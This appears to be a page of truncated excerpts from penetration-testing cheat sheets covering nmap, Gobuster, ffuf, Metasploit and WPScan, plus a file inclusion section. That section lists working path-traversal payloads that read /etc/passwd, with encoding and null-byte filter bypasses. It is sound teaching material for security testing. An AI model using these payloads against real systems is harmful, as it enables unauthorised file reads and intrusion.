PenTest 101 – Cheat Sheet

Command Description sudo nano /etc/hosts Opens the /etc/hosts with nano to start adding hostnames sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list Runs an nmap scan using common web application ports based on a scope list (scope_list) and outputs to a file (web_discovery) in all formats (-oA) eyewitness --web -x web_discovery.xml -d <nameofdirectorytobecreated> Runs eyewitness using a …

Gobuster Cheat Sheet

Common Gobuster Commands dir Mode With content length dns Mode With Show IP Base domain validation warning when the base domain fails to resolve Wildcard DNS is also detected properly: vhost Mode s3 Mode Available Modes Switch Description dir Directory brute-forcing mode dns DNS subdomain brute-forcing mode vhost Virtual host brute-forcing mode (not the …

Complete Guide on ffuf

Fuzz Faster U Fool – v1.3.1 TryHackMe has an excellent room to learn and practice this tool. Highly recommended for beginners. ffuf -h At a minimum we’re required to supply two options: -u to specify a URL and -w to specify a wordlist. The default keyword FUZZ is used to tell ffuf where the wordlist entries will be injected. ffuf …

Ffuf – Cheat Sheet

Ffuf commands Command Description ffuf -h ffuf help ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ Directory Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ Extension Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php Page Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v Recursive Fuzzing ffuf -w wordlist.txt:FUZZ -u https://FUZZ.nlabs.local/ Sub-domain Fuzzing ffuf -w wordlist.txt:FUZZ -u http://nlabs.local:PORT/ …

File Inclusion – Cheat Sheet

Local File Inclusion Command Description Basic LFI /index.php?language=/etc/passwd Basic LFI /index.php?language=../../../../etc/passwd LFI with path traversal /index.php?language=/../../../etc/passwd LFI with name prefix /index.php?language=./languages/../../../../etc/passwd LFI with approved path LFI Bypasses /index.php?language=....//....//....//....//etc/passwd Bypass basic path traversal filter /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 Bypass filters with URL encoding /index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times] Bypass appended extension with path truncation (obsolete) /index.php?language=../../../../etc/passwd%00 Bypass appended extension …

Web Vulnerabilities – File Inclusion

Path Traversal Also known as directory traversal, this web security vulnerability allows an attacker to read operating system resources, such as local files on the server running an application. The attacker exploits it by manipulating the web application’s URL to locate and access files or directories stored outside the application’s root directory. …

Metasploit Cheat Sheet

This entry is part 3 of 5 in the series Red Team Engagements

MSFconsole Commands Command Description show exploits Show all exploits within the Framework. show payloads Show all payloads within the Framework. grep meterpreter show payloads; grep meterpreter grep reverse_tcp show payloads MSF – Searching for Specific Payload show auxiliary Show all auxiliary modules within the Framework. search <name> Search for exploits or modules within the Framework. …

Enumerating WordPress with WPScan

WPScan capabilities Update the local database of WPScan The local database can be updated with the following command: wpscan --update Enumeration Modes When enumerating the WordPress version, installed plugins or installed themes, you can use three different “modes”, which are: The following enumeration options exist: If no option is supplied to the -e flag, then the …